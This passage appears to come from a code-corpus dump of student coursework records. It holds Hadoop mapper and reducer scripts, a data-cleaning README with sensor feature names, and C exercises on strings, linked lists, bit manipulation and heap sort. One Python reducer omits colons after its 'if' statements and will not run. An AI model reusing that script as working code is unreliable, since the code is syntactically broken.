sales down by store, instead give us a sales breakdown by product category across all of our stores.\n\n# Format of each line is:\n# date\\ttime\\tstore name\\titem description\\tcost\\tmethod of payment\n#\n# We want elements 4 (item) and 5 (cost) [KEY = item descr., VALUE = cost]\n# We need to write them out to std output, separated by a tab\n\nimport sys\n\nfor line in sys.stdin:\n data = line.strip().split(\"\\t\")\n if len(data) == 6:\n date, time, store, item, cost, payment = data\n print\"{0}\\t{1}\".format(item, cost)\n" }, { "alpha_fraction": 0.6056009531021118, "alphanum_fraction": 0.6091015338897705, "avg_line_length": 22.80555534362793, "blob_id": "951cd4170c787de799cfdef9c7879296d25bdec2", "content_id": "64db54baa9778db2dc4fd568790613b5430d8287", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 857, "license_type": "no_license", "max_line_length": 84, "num_lines": 36, "path": "/Big-Data/Hadoop/Intro-to-Hadoop-Udacity/Project-Week-3-Part2/ex04reducer.py", "repo_name": "L3ftsid3/Classes", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n \nimport sys\n \nHits = 0\noldKey = None\n \n# Loop around the data\n# It will be in the format key\\tval\n# Where key is the request path name, val is the amount of hits from the mapper\n#\n# In this case we'll print out only the request path: \"/assets/js/the-associates.js\"\n \nfor line in sys.stdin:\n data_mapped = line.strip().split(\"\\t\")\n if len(data_mapped) != 2:\n # Something has gone wrong. Skip this line.\n continue\n \n thisKey, thisHits = data_mapped\n thisHits = int(thisHits)\n \n if oldKey == None:\n oldKey = thisKey\n \n if oldKey != thisKey:\n if oldKey == \"/assets/js/the-associates.js\"\n print oldKey, \"\\t\", Hits\n oldKey = thisKey;\n Hits = 0\n \n Hits += thisHits\n \nif oldKey != None:\n if oldKey == \"/assets/js/the-associates.js\"\n print oldKey, \"\\t\", Hits\n" }, { "alpha_fraction": 0.6611295938491821, "alphanum_fraction": 0.6677740812301636, "avg_line_length": 21.259260177612305, "blob_id": "f763ff1f47115c8e12eb702b9ae2586e89773392", "content_id": "7609aa6e121498fc4964681747d09f7a442c807f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 602, "license_type": "no_license", "max_line_length": 53, "num_lines": 27, "path": "/Big-Data/Hadoop/Intro-to-Hadoop-Udacity/Project--Week-3/ex3reducer.py", "repo_name": "L3ftsid3/Classes", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n \nimport sys\n \nsalesCount = 0\ntotalSales = 0\n \n# Loop around the data\n# It will be in the format key\\tval\n# Where key is the store name, val is the sale amount\n#\n# All the sales will be saved in the two variables:\n# salesCount (number of sales)\n# totalSales (total Value of the sales)\n \nfor line in sys.stdin:\n data_mapped = line.strip().split(\"\\t\")\n if len(data_mapped) != 2:\n # Something has gone wrong. Skip this line.\n continue\n \n thisKey, thisSale = data_mapped\n \n salesCount += 1\n totalSales += float(thisSale)\n \nprint salesCount, \"\\t\", totalSales\n\n" }, { "alpha_fraction": 0.7308707237243652, "alphanum_fraction": 0.7343887686729431, "avg_line_length": 34.8110237121582, "blob_id": "fb93e77f35ce92e39c60136c05e8ba2705c17e07", "content_id": "50d24e2e51a76ddeb802743180f00ed3b1cccef2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 4548, "license_type": "no_license", "max_line_length": 572, "num_lines": 127, "path": "/Data-Analysis/Getting-and-Cleaning-Data/Project/README.md", "repo_name": "L3ftsid3/Classes", "src_encoding": "UTF-8", "text": "Cleaning-Data\n=============\n\nRepo for Cleaning Data Class on Coursera\n\nFeature Selection \n=================\n\nThe features selected for this database come from the accelerometer and gyroscope 3-axial raw signals tAcc-XYZ and tGyro-XYZ. These time domain signals (prefix 't' to denote time) were captured at a constant rate of 50 Hz. Then they were filtered using a median filter and a 3rd order low pass Butterworth filter with a corner frequency of 20 Hz to remove noise. Similarly, the acceleration signal was then separated into body and gravity acceleration signals (tBodyAcc-XYZ and tGravityAcc-XYZ) using another low pass Butterworth filter with a corner frequency of 0.3 Hz. \n\nSubsequently, the body linear acceleration and angular velocity were derived in time to obtain Jerk signals (tBodyAccJerk-XYZ and tBodyGyroJerk-XYZ). Also the magnitude of these three-dimensional signals were calculated using the Euclidean norm (tBodyAccMag, tGravityAccMag, tBodyAccJerkMag, tBodyGyroMag, tBodyGyroJerkMag). \n\nFinally a Fast Fourier Transform (FFT) was applied to some of these signals producing fBodyAcc-XYZ, fBodyAccJerk-XYZ, fBodyGyro-XYZ, fBodyAccJerkMag, fBodyGyroMag, fBodyGyroJerkMag. (Note the 'f' to indicate frequency domain signals). \n\nThese signals were used to estimate variables of the feature vector for each pattern: \n'-XYZ' is used to denote 3-axial signals in the X, Y and Z directions.\n\nIn this case the variables used were those about mean and standard deviation measurements.\nThe List of all the variables used can be found in the last section. \n\n\nData Cleaning and Variable Extraction\n===============================================\nTo clean the data the following steps were taken\n\n1) Loaded the following File in R, from the train and test folder\n Train files: Y_train.txt, X_train.txt, subject_train\n Test files: Y_test.txt, X_test.txt, subject_test\n Features.txt (to get the names for the X_train and X_test data)\n activity_labels.txt (to get the names \n\n2) Added a Column to the Y_train and Y_test data frames to display\n both the activity code and the associated activity. The two new data frames\n were called Updated_Y_train and Updated_X_train\n \n3) Renamed the column in the subject_train and subject_test data frames\n as subject_ID\n \n4) Combined the train and test datasets for X, Y and subject separately.\n The following dataframes were obtained:\n - unfiltered_X (combining X_train and X_test)\n - Y (combining Updated_Y_train and Updated_Y_test)\n - subject (combining subject_train and subject_test)\n\n5) Rename the new subject dataframe column as \"ID\"\n\n6) Filtered the variables in the X Unfiltered_X data frame to only the \n columns that would contain the string \"mean()\" or \"std()\". This was \n done because the excercise required to get only the mean and standard\n deviation measurements. The new dataframe X (with only the filtered \n columns) was then created\n \n7) Combined the three data frames subject, Y and X\n\n\nList of Variables\n==================\n\n+ ID \n+ activity_code\n+ activity\n+ tBodyAcc-mean()-X\n+ tBodyAcc-mean()-Y\n+ tBodyAcc-mean()-Z\n+ tBodyAcc-std()-X\n+ tBodyAcc-std()-Y\n+ tBodyAcc-std()-Z\n+ tGravityAcc-mean()-X\n+ tGravityAcc-mean()-Y\n+ tGravityAcc-mean()-Z\n+ tGravityAcc-std()-X\n+ tGravityAcc-std()-Y\n+ tGravityAcc-std()-Z\n+ tBodyAccJerk-mean()-X\n+ tBodyAccJerk-mean()-Y\n+ tBodyAccJerk-mean()-Z\n+ tBodyAccJerk-std()-X\n+ tBodyAccJerk-std()-Y\n+ tBodyAccJerk-std()-Z\n+ tBodyGyro-mean()-X\n+ tBodyGyro-mean()-Y\n+ tBodyGyro-mean()-Z\n+ tBodyGyro-std()-X\n+ tBodyGyro-std()-Y\n+ tBodyGyro-std()-Z\n+ tBodyGyroJerk-mean()-X\n+ tBodyGyroJerk-mean()-Y\n+ tBodyGyroJerk-mean()-Z\n+ tBodyGyroJerk-std()-X\n+ tBodyGyroJerk-std()-Y\n+ tBodyGyroJerk-std()-Z\n+ tBodyAccMag-mean()\n+ tBodyAccMag-std()\n+ tGravityAccMag-mean()\n+ tGravityAccMag-std()\n+ tBodyAccJerkMag-mean()\n+ tBodyAccJerkMag-std()\n+ tBodyGyroMag-mean()\n+ tBodyGyroMag-std()\n+ tBodyGyroJerkMag-mean()\n+ tBodyGyroJerkMag-std()\n+ fBodyAcc-mean()-X\n+ fBodyAcc-mean()-Y\n+ fBodyAcc-mean()-Z\n+ fBodyAcc-std()-X\n+ fBodyAcc-std()-Y\n+ fBodyAcc-std()-Z\n+ fBodyAccJerk-mean()-X\n+ fBodyAccJerk-mean()-Y\n+ fBodyAccJerk-mean()-Z\n+ fBodyAccJerk-std()-X\n+ fBodyAccJerk-std()-Y\n+ fBodyAccJerk-std()-Z\n+ fBodyGyro-mean()-X\n+ fBodyGyro-mean()-Y\n+ fBodyGyro-mean()-Z\n+ fBodyGyro-std()-X\n+ fBodyGyro-std()-Y\n+ fBodyGyro-std()-Z\n+ fBodyAccMag-mean()\n+ fBodyAccMag-std()\n+ fBodyBodyAccJerkMag-mean()\n+ fBodyBodyAccJerkMag-std()\n+ fBodyBodyGyroMag-mean()\n+ fBodyBodyGyroMag-std()\n+ fBodyBodyGyroJerkMag-mean()\n+ fBodyBodyGyroJerkMag-std()\n" }, { "alpha_fraction": 0.6666666865348816, "alphanum_fraction": 0.6666666865348816, "avg_line_length": 10.25, "blob_id": "92d78454cba7629097b7eada8c682e4db2b76c69", "content_id": "6568a8c0a6ce4a0ac6f00624295026a80d409642", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 45, "license_type": "no_license", "max_line_length": 27, "num_lines": 4, "path": "/README.md", "repo_name": "L3ftsid3/Classes", "src_encoding": "UTF-8", "text": "Classes\n=======\n\nRepo for All Online Classes\n" }, { "alpha_fraction": 0.8571428656578064, "alphanum_fraction": 0.8571428656578064, "avg_line_length": 34, "blob_id": "0c9e824f6bd00e00cd833a85e1a1862d9eb1c49f", "content_id": "fe5f2b89bb5259bb60cc8400add15160b1de54bf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 35, "license_type": "no_license", "max_line_length": 34, "num_lines": 1, "path": "/Machine-Learning/Machine-Learning-Coursera/README.md", "repo_name": "L3ftsid3/Classes", "src_encoding": "UTF-8", "text": "Machine Learning Class on Coursera\n" }, { "alpha_fraction": 0.849056601524353, "alphanum_fraction": 0.849056601524353, "avg_line_length": 52, "blob_id": "fd49a7860692552d4964e8250de426ba1e065be1", "content_id": "c5194dd8a74a04bd8c0e9ea6c6f35f13de203b1c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 53, "license_type": "no_license", "max_line_length": 52, "num_lines": 1, "path": "/Machine-Learning/Learning-From-Data-EDX/README.md", "repo_name": "L3ftsid3/Classes", "src_encoding": "UTF-8", "text": "Solutions from Learrning from Data EDX-CalTech Class\n" }, { "alpha_fraction": 0.7457627058029175, "alphanum_fraction": 0.7796609997749329, "avg_line_length": 43, "blob_id": "67eea845d5436ce40df5c2f75362d0dccdcb7c5e", "content_id": "e85cc80dcd108bd6775da64eebd45ddfbab822e5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 177, "license_type": "no_license", "max_line_length": 138, "num_lines": 4, "path": "/Web-Development/Tutorials/Django-Landing-Page/README.md", "repo_name": "L3ftsid3/Classes", "src_encoding": "UTF-8", "text": "This is the django-landingpage app\n\n\n[![Bitdeli Badge](https://d2weczhvl823v0.cloudfront.net/jthreatt4/django-landingpage/trend.png)](https://bitdeli.com/free \"Bitdeli Badge\")\n\n" } ]
14
astark13/webmap_app
https://github.com/astark13/webmap_app
db2ca38740b2c17b304367828dd91283164e6e3e
4312ccb2b10a6cc7d08518999445fa8e23170470
9228f83ac5ea4c91db4920006271acdf91277f18
refs/heads/master
2023-01-21T10:14:58.517015
2020-11-25T10:10:25
2020-11-25T10:10:25
313,311,661
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6646670699119568, "alphanum_fraction": 0.7006598711013794, "avg_line_length": 51.09375, "blob_id": "d4e8a7c6c66895e08b2dc4d58be0b290512ce74d", "content_id": "333b5a4c174f2f4e032a305928b9240b905be448", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1667, "license_type": "no_license", "max_line_length": 245, "num_lines": 32, "path": "/map1.py", "repo_name": "astark13/webmap_app", "src_encoding": "UTF-8", "text": "import folium, pandas\ndata=pandas.read_csv(\"Volcanoes.txt\") # creates dataframe \nlat=list(data[\"LAT\"]) # turns dataframe column into list\nlon=list(data[\"LON\"])\nelev=list(data[\"ELEV\"])\n\ndef color_producer(elevation):\n if elevation < 1000:\n return 'green'\n elif 1000<=elevation<=3000: \n return 'orange'\n else:\n return 'red'\n\nmap = folium.Map(location=[48.77,-121.81],zoom_start=10, tiles=\"Stamen Terrain\") # creates a map with a base location\n\nfgv = folium.FeatureGroup(name=\"Volcanoes\") # creates a feature group layer that contains markers for volcanoes\n\nfor lt, ln, el in zip(lat,lon,elev):\n fgv.add_child(folium.CircleMarker(location=[lt,ln], radius=6, popup=str(el)+\"m\", \n fill_color=color_producer(el), color='grey', fill_opacity=0.7)) # each marker is represented by a circle, showing the altitude and different colors based on the altitude\n\nfgp = folium.FeatureGroup(name=\"Population\") # creates a feature group layer that contains data about population\n\n# the fgp layer shows borders(areas) and based on data regarding population from the json assigns a color to each country\nfgp.add_child(folium.GeoJson(open(\"world.json\",encoding = \"utf-8-sig\").read(), style_function=lambda x:{'fillColor':'green' if x['properties']['POP2005'] < 10000000 else 'orange' if 10000000 <= x['properties']['POP2005'] < 20000000 else 'red'}))\n\nmap.add_child(fgv) # adds the fgv layer to the map\nmap.add_child(fgp) # adds the fgp layer to the map\nmap.add_child(folium.LayerControl()) # creates a button in the upper right corner allowing you to disable/enable layers\n\nmap.save(\"Map1.html\")\n" } ]
1
david-develop/holbertonschool-low_level_programming
https://github.com/david-develop/holbertonschool-low_level_programming
bf8754f35ea028cec60bdb470d9fcedae0def50a
0403515874b32178ebf1675683d1363fa02ea60c
76d447addcdbc1af83b805ed921690ddc76df255
refs/heads/master
2020-06-06T14:15:13.492697
2020-03-26T20:34:45
2020-03-26T20:34:45
192,760,565
1
2
null
null
null
null
null
[ { "alpha_fraction": 0.5211970210075378, "alphanum_fraction": 0.5336658358573914, "avg_line_length": 17.227272033691406, "blob_id": "f1e739e95324a77d47f455a07893acad0a30353e", "content_id": "0622d0806778b16ef24cb89ae09fcbdfb9a0ce09", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 401, "license_type": "no_license", "max_line_length": 58, "num_lines": 22, "path": "/0x07-pointers_arrays_strings/4-strpbrk.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"holberton.h\"\n/**\n * _strpbrk - searches a string for any of a set of bytes.\n * @s: input string.\n * @accept: character to be compared.\n * Return: pointer to string.\n */\nchar *_strpbrk(char *s, char *accept)\n{\n\tunsigned int i, j;\n\tchar *nu = 0;\n\n\tfor (i = 0; s[i] != '\\0'; i++)\n\t{\n\t\tfor (j = 0; accept[j] != '\\0'; j++)\n\t\t{\n\t\t\tif (s[i] == accept[j])\n\t\t\t\treturn (s + i);\n\t\t}\n\t}\n\treturn (nu);\n}\n" }, { "alpha_fraction": 0.5106951594352722, "alphanum_fraction": 0.5240641832351685, "avg_line_length": 13.384614944458008, "blob_id": "5ff8d4ad7f6b67421971a95801f9bb6fd802d033", "content_id": "8c8d9b3b747736f094df4cc8b3f7eb8dadeb8e3d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 374, "license_type": "no_license", "max_line_length": 74, "num_lines": 26, "path": "/0x04-more_functions_nested_loops/8-print_square.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"holberton.h\"\n/**\n * print_square - Prints diagonal at the n value.\n * @size: variable for the size of the square, defined by the input value.\n */\n\nvoid print_square(int size)\n{\n\tchar a = 35, x, y;\n\n\tif (size > 0)\n\t{\n\t\tfor (y = 0; y < size; y++)\n\t\t{\n\t\t\tfor (x = 0; x < size; x++)\n\t\t\t{\n\t\t\t\t_putchar(a);\n\t\t\t}\n\t\t\t_putchar('\\n');\n\t\t}\n\t}\n\telse\n\t{\n\t\t_putchar('\\n');\n\t}\n}\n" }, { "alpha_fraction": 0.5944055914878845, "alphanum_fraction": 0.6107226014137268, "avg_line_length": 19.428571701049805, "blob_id": "8f1b711fbad3b8f061ded8cb61ef511753153ada", "content_id": "e5402945e4ec41a5331f1673fbf851195a56ee1c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 429, "license_type": "no_license", "max_line_length": 61, "num_lines": 21, "path": "/0x14-bit_manipulation/4-clear_bit.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"holberton.h\"\n\n/**\n * clear_bit - sets the value of a bit to 0 at a given index.\n * @n: address to the given number.\n * @index: binary index.\n * Return: 1 if worked, -1 if error.\n */\nint clear_bit(unsigned long int *n, unsigned int index)\n{\n\tint a = 1;\n\tunsigned int size;\n\tunsigned long int p;\n\n\tsize = sizeof(unsigned long int) * 8;\n\tif (index > size)\n\t\treturn (-1);\n\tp = (~(a << index));\n\t*n = *n & p;\n\treturn (1);\n}\n" }, { "alpha_fraction": 0.5243682265281677, "alphanum_fraction": 0.5505415201187134, "avg_line_length": 20.30769157409668, "blob_id": "133b785b04451de22abf3d8de60e2a4900ac6ddf", "content_id": "56a73d5baccea2d41a7cdfa4cdbd87cdc8c30a59", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 1108, "license_type": "no_license", "max_line_length": 66, "num_lines": 52, "path": "/0x0C-more_malloc_free/1-string_nconcat.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"holberton.h\"\n#include <stdlib.h>\n/**\n * string_nconcat - concatenates one string to another at n bytes.\n * @s1: input string 1.\n * @s2: input string 2.\n * @n: n bytes to be cated.\n * Return: Pointer to allocated memory.\n */\nchar *string_nconcat(char *s1, char *s2, unsigned int n)\n{\n\tchar *cated_string = NULL;\n\tunsigned int i, j, iter_n, total_l, p;\n\n\ti = 0;\n\titer_n = 0;\n\n\tif (s1 == NULL)\n\t\ts1 = \"\";\n\tif (s2 == NULL)\n\t\ts2 = \"\";\n\n\t/*count first and second string*/\n\tfor (i = 0; s1[i] != '\\0'; i++)\n\t\t;\n\tfor (j = 0; s2[j] != '\\0'; j++)\n\t\t;\n\t/*condition if n > a lenght of s2*/\n\tif (n >= j)\n\t\ttotal_l = i + j;\n\telse if (n < j)\n\t\ttotal_l = i + n;\n\n\tcated_string = malloc(sizeof(char) * (total_l + 1));\n\tif (cated_string == NULL)\n\t\treturn (NULL);\n\n\t/*add second string to the first until n and only to the '\\0'*/\n\tfor (iter_n = 0, p = 0; iter_n < total_l; iter_n++)\n\t{\n\t\tif (iter_n < i)\n\t\t\tcated_string[iter_n] = s1[iter_n];\n\t\telse if (iter_n >= i && s2[p] != '\\0')\n\t\t{\n\t\t\tcated_string[iter_n] = s2[p];\n\t\t\tp++;\n\t\t}\n\t}\n\t/* add '\\0' at the end */\n\tcated_string[iter_n] = '\\0';\n\treturn (cated_string);\n}\n" }, { "alpha_fraction": 0.822857141494751, "alphanum_fraction": 0.822857141494751, "avg_line_length": 175, "blob_id": "c87f54b8254e2bc1d749036f2b1fd3e0861dbb82", "content_id": "bda8e8d6dd21c093f054827a8c232950dae6e33f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 175, "license_type": "no_license", "max_line_length": 175, "num_lines": 1, "path": "/0x06-pointers_arrays_strings/README.md", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "This is a project for study purposes regardles to pointers and arrays, the project must be completed in one day and have different kind of functions using pointers and arrays." }, { "alpha_fraction": 0.6051136255264282, "alphanum_fraction": 0.6107954382896423, "avg_line_length": 17.526315689086914, "blob_id": "2470158d6f6e7698e80e4b80fcdbad4b91bdf148", "content_id": "d1e7db2c2506f6986109e3ec315084213a46994a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 354, "license_type": "no_license", "max_line_length": 66, "num_lines": 19, "path": "/0x13-more_singly_linked_lists/6-pop_listint.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"lists.h\"\n/**\n * pop_listint - deletes the head node of a list.\n * @head: pointer to first node.\n * Return: returns the head node’s data (n) or 0 if list is empty.\n */\nint pop_listint(listint_t **head)\n{\n\tlistint_t *temp;\n\tint n;\n\n\tif (*head == NULL)\n\t\treturn (0);\n\ttemp = *head;\n\tn = temp->n;\n\t*head = temp->next;\n\tfree(temp);\n\treturn (n);\n}\n" }, { "alpha_fraction": 0.8177340030670166, "alphanum_fraction": 0.8177340030670166, "avg_line_length": 39.79999923706055, "blob_id": "ff4d49a7a47d47ca04222bfedf01be13fc7bf6b6", "content_id": "670173ba468d8276110879113e346b59bf38197d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 203, "license_type": "no_license", "max_line_length": 84, "num_lines": 5, "path": "/0x0D-preprocessor/README.md", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "This repository contains files about Preprocessor in C, project to study this topis:\n\nWhat are macros and how to use them\nWhat are the most common predefined macros\nHow to include guard your header files" }, { "alpha_fraction": 0.5093333125114441, "alphanum_fraction": 0.5386666655540466, "avg_line_length": 16.85714340209961, "blob_id": "d7ebc83b7168d3560a056c95e5652584d33b9377", "content_id": "a1b62511f4dd90204bf1ce29edc6549855acddd0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 750, "license_type": "no_license", "max_line_length": 66, "num_lines": 42, "path": "/0x0B-malloc_free/2-str_concat.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"holberton.h\"\n#include <stdlib.h>\n#include <stdio.h>\n/**\n * str_concat - concatenates two strings in a new allocated space.\n * @s1: given string 1.\n * @s2: given string 2, which is concatenated.\n * Return: Pointer to allocated memory.\n */\nchar *str_concat(char *s1, char *s2)\n{\n\tchar *cat_ar;\n\tunsigned int i, j, cp, r, final_leng;\n\n\tif (s1 == NULL)\n\t\ts1 = \"\";\n\tif (s2 == NULL)\n\t\ts2 = \"\";\n\n\tfor (i = 0; s1[i] != '\\0'; i++)\n\t\t;\n\tfor (j = 0; s2[j] != '\\0'; j++)\n\t\t;\n\tfinal_leng = i + j + 1;\n\n\tcat_ar = malloc(final_leng * sizeof(char));\n\n\tif (cat_ar == NULL)\n\t\treturn (NULL);\n\n\tfor (cp = 0; cp < i; cp++)\n\t{\n\t\tcat_ar[cp] = s1[cp];\n\t}\n\tfor (r = 0; r < j; cp++, r++)\n\t{\n\t\tcat_ar[cp] = s2[r];\n\t}\n\tcat_ar[final_leng] = s2[r];\n\n\treturn (cat_ar);\n}\n" }, { "alpha_fraction": 0.5913357138633728, "alphanum_fraction": 0.6064981818199158, "avg_line_length": 19.072463989257812, "blob_id": "7dbe4b1c4aabffdbc1369b327a95802bd3ff329e", "content_id": "35834f5694813e239e6d07a8dad09e659180d705", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 1385, "license_type": "no_license", "max_line_length": 78, "num_lines": 69, "path": "/0x1B-sorting_algorithms/104-heap_sort.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"sort.h\"\n\n/**\n * swap - change position between two position of an array and print the array\n * @array: array to sort\n * @first: lowest position\n * @last: highest position\n * @size: size of array\n */\nvoid swap(int *array, int first, int last, size_t size)\n{\n\tint aux, value;\n\n\tvalue = array[first];\n\taux = array[last];\n\tarray[last] = value;\n\tarray[first] = aux;\n\tprint_array(array, size);\n}\n\n/**\n * heap_change - find bigger in a heap level\n * @array: array of integers\n * @size_1: max index in binary tree\n * @size_2: size of the array for printing\n * @i: index of head node.\n */\nvoid heap_change(int *array, size_t size_1, size_t i, size_t size_2)\n{\n\tsize_t max, left, right;\n\n\tmax = i;\n\tleft = 2 * i + 1;\n\tright = 2 * i + 2;\n\n\tif (left < size_1 && array[left] > array[max])\n\t\tmax = left;\n\n\tif (right < size_1 && array[right] > array[max])\n\t\tmax = right;\n\n\tif (max != i)\n\t{\n\t\tswap(array, i, max, size_2);\n\n\t\theap_change(array, size_1, max, size_2);\n\t}\n}\n/**\n * heap_sort - sorts an array of integers in ascending order using the Heap\n * sort algorithm.\n * @array: array of integers\n * @size: size of array\n */\nvoid heap_sort(int *array, size_t size)\n{\n\tint i;\n\n\tif (!array || size == 1)\n\t\treturn;\n\tfor (i = size / 2 - 1; i >= 0; i--)\n\t\theap_change(array, size, i, size);\n\n\tfor (i = size - 1; i > 0; i--)\n\t{\n\t\tswap(array, 0, i, size);\n\t\theap_change(array, i, 0, size);\n\t}\n}\n" }, { "alpha_fraction": 0.5403226017951965, "alphanum_fraction": 0.5524193644523621, "avg_line_length": 12.777777671813965, "blob_id": "a156b24f9ae1a7dc000b2400faccd5adffc9f077", "content_id": "fd5ac6d209934d28120afcdd8040235acfc67f83", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 248, "license_type": "no_license", "max_line_length": 48, "num_lines": 18, "path": "/0x02-functions_nested_loops/3-islower.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"holberton.h\"\n/**\n * _islower - Verify if the letter is lowercase.\n * @c: variable for input value.\n * Return: when is a lower letter 1.\n */\n\nint _islower(int c)\n{\n\tif (c >= 'a' && c <= 'z')\n\t{\n\t\treturn (1);\n\t}\n\telse\n\t{\n\t\treturn (0);\n\t}\n}\n" }, { "alpha_fraction": 0.8230088353157043, "alphanum_fraction": 0.8230088353157043, "avg_line_length": 31.285715103149414, "blob_id": "d05997636785bfec0bb171ea6c882a4ddecaa635", "content_id": "01d3bff0f8d97d0d0f38219e0224e0be4541a2ad", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 226, "license_type": "no_license", "max_line_length": 60, "num_lines": 7, "path": "/0x0F-function_pointers/README.md", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "This repository is about function pointers programs:\n\nLearning objectives:\n\nWhat are function pointers and how to use them\nWhat does a function pointer exactly hold\nWhere does a function pointer point to in the virtual memory\n" }, { "alpha_fraction": 0.523668646812439, "alphanum_fraction": 0.5295857787132263, "avg_line_length": 15.095237731933594, "blob_id": "4bb2d0a31369311a92adda828155dc704aaa11a7", "content_id": "7acfb8586de4a5d3dda58f05ef3c15a3b34fc236", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 338, "license_type": "no_license", "max_line_length": 54, "num_lines": 21, "path": "/0x06-pointers_arrays_strings/5-string_toupper.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"holberton.h\"\n/**\n * string_toupper - print the given string in reverse.\n * @s: given string.\n * Return: the string in upper.\n */\nchar *string_toupper(char *s)\n{\n\tint iter;\n\n\tfor (iter = 0; s[iter] != '\\0'; iter++)\n\t{\n\t\tif (s[iter] >= 'a' && s[iter] <= 'z')\n\t\t{\n\t\t\ts[iter] += 'A' - 'a';\n\t\t}\n\t\telse\n\t\t\tcontinue;\n\t}\n\treturn (s);\n}\n" }, { "alpha_fraction": 0.41923776268959045, "alphanum_fraction": 0.45916515588760376, "avg_line_length": 12.439023971557617, "blob_id": "abbc179e4ea1894b24d5a07a170d7e8a060b91f1", "content_id": "40f2ce643afdc85c874d15895ec8f83a7a9676e3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 551, "license_type": "no_license", "max_line_length": 56, "num_lines": 41, "path": "/0x02-functions_nested_loops/11-print_to_98.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"holberton.h\"\n#include <stdio.h>\n/**\n * print_to_98 - prints the natural numbers from n to 98\n * @n: input value.\n *\n */\n\nvoid print_to_98(int n)\n{\n\tint start;\n\n\tif (n <= 98)\n\t{\n\t\tfor (start = n; start <= 98; start++)\n\t\t{\n\t\t\tif (!(start == 98))\n\t\t\t{\n\t\t\t\tprintf(\"%d, \", start);\n\t\t\t}\n\t\t\telse if (start == 98)\n\t\t\t{\n\t\t\t\tprintf(\"%d\\n\", start);\n\t\t\t}\n\t\t}\n\t}\n\tif (n > 98)\n\t{\n\t\tfor (start = n; start >= 98; start--)\n\t\t{\n\t\t\tif (!(start == 98))\n\t\t\t{\n\t\t\t\tprintf(\"%d, \", start);\n\t\t\t}\n\t\t\telse if (start == 98)\n\t\t\t{\n\t\t\t\tprintf(\"%d\\n\", start);\n\t\t\t}\n\t\t}\n\t}\n}\n" }, { "alpha_fraction": 0.5567867159843445, "alphanum_fraction": 0.5623268485069275, "avg_line_length": 16.190475463867188, "blob_id": "8ae2660a1391ae24d70054b1e54ed6fed008a355", "content_id": "4c772d4111636e5542d65e7fe5630a2248bcd1ad", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 361, "license_type": "no_license", "max_line_length": 59, "num_lines": 21, "path": "/0x05-pointers_arrays_strings/8-print_array.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"holberton.h\"\n#include <stdio.h>\n/**\n * print_array - prints n elements of an array of integers.\n * @a: input string.\n * @n: number of elements of the array to be printed.\n */\nvoid print_array(int *a, int n)\n{\n\tint posi;\n\n\tfor (posi = 0; posi < n; posi++)\n\t{\n\t\tprintf(\"%d\", a[posi]);\n\t\tif (posi != (n - 1))\n\t\t{\n\t\t\tprintf(\", \");\n\t\t}\n\t}\n\tprintf(\"\\n\");\n}\n" }, { "alpha_fraction": 0.5470085740089417, "alphanum_fraction": 0.5555555820465088, "avg_line_length": 12.764705657958984, "blob_id": "0e6333578520a0ea857b72b2f00814d9d43e3493", "content_id": "155dc876b173f9b732b154899f5a071a9878101b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 234, "license_type": "no_license", "max_line_length": 48, "num_lines": 17, "path": "/0x05-pointers_arrays_strings/2-strlen.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"holberton.h\"\n/**\n * _strlen - finds the length of a given string.\n * @s: input string.\n * Return: lenght of the string.\n */\nint _strlen(char *s)\n{\n\tint leng 